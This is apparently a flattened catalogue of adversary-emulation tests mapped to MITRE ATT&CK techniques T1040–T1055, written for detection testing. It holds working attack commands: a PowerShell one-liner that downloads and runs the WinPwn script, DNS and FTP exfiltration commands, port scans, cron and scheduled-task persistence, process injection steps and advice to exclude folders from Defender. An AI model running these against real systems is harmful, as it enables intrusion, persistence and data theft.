Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
installed.
Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
Prereq: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
if (test-path "c:\program files\wireshark\tshark.exe") {exit 0} else {exit 1}
Prereq: npcap must be installed.
if (test-path "C:\Program Files\Npcap\npcap.sys") {exit 0} else {exit 1}
Description: Will start a packet capture and store log file as t1040.etl.
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Cleanup:
del %TEMP%\t1040.etl
T1040 - Network Sniffing
Windows Internal pktmon set filter
pktmon.exe filter add -p 445
Description: Select Desired ports for packet capture
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Cleanup:
pktmon filter remove
T1040 - Network Sniffing
Packet Capture macOS using /dev/bpfN with sudo
sudo /tmp/t1040_macos_pcapdemo -i en0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_macos_pcapdemo
T1040 - Network Sniffing
Filtered Packet Capture macOS using /dev/bpfN with sudo
sudo /tmp/t1040_macos_pcapdemo -f -i en0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_macos_pcapdemo
T1040 - Network Sniffing
Packet Capture FreeBSD using /dev/bpfN with sudo
sudo /tmp/t1040_freebsd_pcapdemo -i em0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_freebsd_pcapdemo
T1040 - Network Sniffing
Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
sudo /tmp/t1040_freebsd_pcapdemo -f -i em0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_freebsd_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
sudo /tmp/t1040_linux_pcapdemo -a -t 3
Description: Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few seconds.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo
sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3
Description: Captures packets with domain=AF_INET,type=SOCK_RAW,protocol=TCP for a few seconds.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo
sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3
Description: Captures packets with domain=AF_INET,type=SOCK_PACKET,protocol=UDP for a few seconds.
SOCK_PACKET is "obsolete" according to the man page, but still works on Ubuntu 20.04
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo
sudo /tmp/t1040_linux_pcapdemo -a -f -t 3
Description: Captures packets with domain=AF_PACKET,type=SOCK_RAW for a few seconds.
Sets a BPF filter on the socket to filter for UDP traffic.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Description: Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
T1046 - Network Service Discovery
Port Scan
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/192.168.1.1/$port) && echo port $port is open ; done
Description: Scan ports to check for listening ports.
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Description: Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Prereq: Check if nmap command exists on the machine
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
Prereq: Check if nc command exists on the machine
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
Prereq: Check if telnet command exists on the machine
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
T1046 - Network Service Discovery
Port Scan NMap for Windows
nmap 127.0.0.1
Description: Scan ports to check for listening ports for the local host 127.0.0.1
Prereq: NMap must be installed
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
T1046 - Network Service Discovery
Port Scan using python
python "T1046\src\T1046.py" -i 127.0.0.1
Description: Scan ports to check for listening ports with python
Description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
T1046 - Network Service Discovery
WinPwn - fruit
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput
Description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
foreach ($ip in $subnetIPs) { foreach ($port in $ports) { try { $tcp = New-Object Net.Sockets.TcpClient $tcp.ConnectAsync($ip, $port).Wait(200) | Out-Null } catch {} if ($tcp.Connected) { $tcp.Close() Write-Host "Port $port is open on $ip" } } } } else { Write-Host "[Error] Invalid Inputs" exit 1 }
Description: Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
Description: Availability of remote desktop services can be checked using get- cmdlet of PowerShell
T1046 - Network Service Discovery
Port Scan using nmap (Port range)
nmap -Pn -sV -p 0-65535 127.0.0.1
Description: Scan multiple ports to check for listening ports with nmap
Prereq: Check if nmap command exists on the machine
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
T1047 - Windows Management Instrumentation
WMI Reconnaissance Users
wmic useraccount get /ALL /format:csv
Description: An adversary might use WMI to list all local User Accounts.
When the test completes , there should be local user accounts information displayed on the command line.
T1047 - Windows Management Instrumentation
WMI Reconnaissance Processes
wmic process get caption,executablepath,commandline /format:csv
Description: An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
T1047 - Windows Management Instrumentation
WMI Reconnaissance Software
wmic qfe get description,installedOn /format:csv
Description: An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
T1047 - Windows Management Instrumentation
WMI Reconnaissance List Remote Services
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
Description: An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreachable
T1047 - Windows Management Instrumentation
WMI Execute Local Process
wmic process call create notepad.exe
Description: This test uses wmic.exe to execute a process on the local host.
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
Cleanup:
wmic process where name='notepad.exe' delete >nul 2>&1
T1047 - Windows Management Instrumentation
WMI Execute Remote Process
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
Description: This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
Cleanup:
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process where name='notepad.exe' delete >nul 2>&1
T1047 - Windows Management Instrumentation
Create a Process using WMI Query and an Encoded Command
Description: Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand
Where the –EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
Description: This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
wmic /node:127.0.0.1 process call create "rundll32.exe \"..\ExternalPayloads\calc.dll\" StartW"
Description: This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
Prereq: DLL with function to execute must exist on disk at specified location (..\ExternalPayloads\calc.dll)
if (Test-Path "..\ExternalPayloads\calc.dll") {exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe
T1047 - Windows Management Instrumentation
Application uninstall using WMIC
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall
Description: Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
Description: Exfiltrate data over HTTPS using wget --post-data method
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Exfiltration Over Alternative Protocol - HTTP
{MISSING IN ATOMIC RED TEAM}
Description: A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337.
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over ICMP protocol.
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Exfiltration Over Alternative Protocol - DNS
{MISSING IN ATOMIC RED TEAM}
Description: Exfiltration of specified file over DNS protocol.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
MAZE FTP Upload
$Dir_to_copy = "$env:windir\temp" $ftp = "ftp://127.0.0.1/" $web_client = New-Object System.Net.WebClient $web_client.Credentials = New-Object System.Net.NetworkCredential('None', 'None') if (test-connection -count 1 -computername "127.0.0.1" -quiet) {foreach($file in (dir $Dir_to_copy "*.7z")) {echo "Uploading $file..." $uri = New-Object System.Uri($ftp+$file.name) $web_client.UploadFile($uri, $file.FullName)}} else {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
Description: This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server.
Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Description: Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
Prereq: Check if the exfil package exists
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
Prereq: Check if rclone zip exists
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Python3 http.server
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
Description: An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
Description: Input a domain and test Exfiltration over SSH
Remote to Local
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
Description: Input a domain and test Exfiltration over SSH
Local to Remote
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
Description: DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
Prereq: DNSExfiltrator powershell file must exist on disk at specified location (..\ExternalPayloads\dnsexfil.ps1)
if (Test-Path "..\ExternalPayloads\dnsexfil.ps1") {exit 0} else {exit 1}
T1048 - Exfiltration Over Alternative Protocol
Exfiltrate Data using DNS Queries via dig
dig @8.8.8.8 -p 53 $(echo "this is a secret info" | base64).google.com
Description: This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and
making DNS queries via the dig command to a controlled DNS server.
Prereq: dig command
which dig
T1049 - System Network Connections Discovery
System Network Connections Discovery
netstat net use net sessions
Description: Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
T1049 - System Network Connections Discovery
System Network Connections Discovery with PowerShell
Get-NetTCPConnection
Description: Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
T1049 - System Network Connections Discovery
System Network Connections Discovery FreeBSD, Linux & MacOS
netstat who -a
Description: Get a listing of network connections.
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Prereq: Check if netstat command exists on the machine
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
foreach ($syntax in $syntaxList) { ..\ExternalPayloads\SharpView.exe $syntax -}
Description: Get a listing of network connections, domains, domain users, and etc.
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout.
Prereq: Sharpview.exe must exist on disk at specified location (..\ExternalPayloads\SharpView.exe)
if (Test-Path "..\ExternalPayloads\SharpView.exe") {exit 0} else {exit 1}
T1053.002 - Scheduled Task/Job: At
At.exe Scheduled task
at 13:20 /interactive cmd
Description: Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
T1053.002 - Scheduled Task/Job: At
At - Schedule a job
echo "echo Hello from Atomic Red Team" | at now + 1 minute
Description: This test submits a command to be run in the future by the `at` daemon.
Prereq: The `at` and `atd` executables must exist in the PATH
if [ "$(uname)" = 'FreeBSD' ]; then which at; else which at && which atd; fi;
Prereq: The `atd` daemon must be running
if [ $(uname) = 'Linux' ]; then systemctl status atd || service atd status; fi;
T1053.002 - Scheduled Task/Job: At
At - Schedule a job via kubectl in a Pod
kubectl run atomic-at-schedule --image=ubuntu --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l"
Description: Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
and submits a job with `at`. The pod is deleted after execution.
Description: This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Cleanup:
crontab /tmp/notevil
T1053.003 - Scheduled Task/Job: Cron
Cron - Add script to all cron subfolders
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.daily/persistevil echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.hourly/persistevil echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.monthly/persistevil echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.weekly/persistevil
Description: This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "echo '*/5 * * * * root echo "Hello from Atomic Red Team"' > /tmp/atomic.log" > /etc/cron.d/persistevil
Description: This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Cleanup:
rm /etc/cron.d/persistevil -f
T1053.003 - Scheduled Task/Job: Cron
Cron - Add script to /var/spool/cron/crontabs/ folder
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" >> /var/spool/cron/crontabs/persistevil
Description: This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Description: Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
Description: Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
Description: Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
Description: This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
$xml = [System.IO.File]::ReadAllText("T1053.005\src\T1053_005_WMI.xml") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Description: Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
Prereq: File to copy must exist on disk at specified location (T1053.005\src\T1053_005_WMI.xml)
if (Test-Path "T1053.005\src\T1053_005_WMI.xml") {exit 0} else {exit 1}
Description: A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
The scheduled task will launch powershell to decode and run the command in the registry daily.
This is a persistence mechanism recently seen in use by Qakbot.
[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
$xml = [System.IO.File]::ReadAllText("T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Description: Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute.
This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
Prereq: File to copy must exist on disk at specified location (T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
if (Test-Path "T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") {exit 0} else {exit 1}
Cleanup:
Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
Description: Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered.
It will first be created to spawn cmd.exe, but modified to run notepad.exe.
Upon successful execution, powershell.exe will create a scheduled task and modify the action.
Description: Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Prereq: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
if (Test-Path "..\ExternalPayloads\GhostTask.exe") { exit 0} else { exit 1}
Description: Adds persistence by abusing `compmgmt.msc` via a scheduled task.
When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`).
This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
Description: Adds persistence by abusing `eventviewer.msc` via a scheduled task.
When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`).
Description: Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
Prereq: Check if systemd-run exists on the machine
if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi;
Description: Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
Prereq: Check if systemd-run exists on the machine
if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi;
Description: Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Prereq: kubectl must be installed
which kubectl
T1053.007 - Kubernetes Cronjob
CreateCronjob
kubectl create -f src/cronjob.yaml -n default
Description: Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Prereq: kubectl must be installed
which kubectl
Cleanup:
kubectl delete cronjob art -n default
T1055.001 - Process Injection: Dynamic-link Library Injection
Description: Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
Prereq: Utility to inject must exist on disk at specified location (T1055.001\src\x64\T1055.001.dll)
if (Test-Path "T1055.001\src\x64\T1055.001.dll") {exit 0} else {exit 1}
T1055.001 - Process Injection: Dynamic-link Library Injection
WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
Description: This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds.
Prereq: Portable Executable to inject must exist at specified location (T1055.002\bin\RedInjection.exe)
if (Test-Path "T1055.002\bin\RedInjection.exe") {exit 0} else {exit 1}
Description: This test injects a MessageBox shellcode generated by msfvenom in Notepad.exe using Thread Execution Hijacking. When successful, a message box will appear with the "Atomic Red Team" caption after one or two seconds.
T1055.004 - Process Injection: Asynchronous Procedure Call
Process Injection via C#
"T1055.004\bin\T1055.exe"
Description: Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
Prereq: T1055.004\bin\T1055.exe must be exist on system.
if (Test-Path "T1055.004\bin\T1055.exe") {exit 0} else {exit 1}
T1055.004 - Process Injection: Asynchronous Procedure Call
Description: Creates a process in a suspended state and calls QueueUserAPC WinAPI to add a UserAPC to the child process that points to allocated shellcode.
ResumeThread is called which then calls NtTestAlert to execute the created UserAPC which then executes the shellcode.
This technique allows for the early execution of shellcode and potentially before AV/EDR can hook functions to support detection.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
- References:
- https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/
- https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
T1055.004 - Process Injection: Asynchronous Procedure Call
Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
$T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
Description: Uses the undocumented NtQueueAPCThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode.
Since the shellcode is loaded and executed in the current process it is considered local shellcode execution.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Get a handle to the current thread
5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
- References:
- https://repnz.github.io/posts/apc/user-apc/
- https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html
- https://0x00sec.org/t/process-injection-apc-injection/24608
- https://twitter.com/aionescu/status/992264290924032005
- http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
T1055.011 - Process Injection: Extra Window Memory Injection
Process Injection via Extra Window Memory (EWM) x64 executable
T1055.011\bin\T1055.011_#{arch}.exe
Description: Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
Prereq: T1055.011x64.exe and payload must exist on disk at specified location (T1055.011\bin\T1055.011_#{arch}.exe and T1055.011\bin\payload.exe_#{arch}.bin)
if (Test-Path T1055.011\bin\T1055.011_#{arch}.exe) {exit 0} else {exit 1}
. "T1055.012\src\Start-Hollow.ps1" $ppid=Get-Process explorer | select -expand id Start-Hollow -Sponsor "C:\Windows\System32\notepad.exe" -Hollow "C:\Windows\System32\cmd.exe" -ParentPID $ppid -Verbose
Description: This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
Prereq: Start-Hollow.ps1 must be installed
if (Test-Path "T1055.012\src\Start-Hollow.ps1") {exit 0} else {exit 1}
Description: Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
Description: Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
Description: This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting exploits Window with ListView control. Code write to memory with NtWriteVirtualMemory. The shellcode is executed via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.
Prereq: Injector ListPlanting.exe must exist at specified location (T1055.015\bin\ListPlanting.exe)
if (Test-Path "T1055.015\bin\ListPlanting.exe") {exit 0} else {exit 1}
Description: This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
Prereq: The 64-bit version of Microsoft Office must be installed
Description: Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
Especially useful against domain controllers in Active Directory environments.
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in
Prereq: Mimikatz executor must exist on disk and at specified location (%tmp%\mimikatz\x64\mimikatz.exe)
Description: This test creates a section object in the local process followed by a local section view.
The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view.
A thread is then created in the target process, using the remote section view as start address.
Description: This test used the Windows undocumented remote-fork API RtlCreateProcessReflection to create a cloned process of the parent process
with shellcode written in its memory. The shellcode is executed after being forked to the child process. The technique was first presented at
BlackHat Europe 2022. Shellcode will open a messsage box and a notepad.
Description: This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode.
The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms
that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.
The injected shellcode will open a message box and a notepad.
RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.
More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
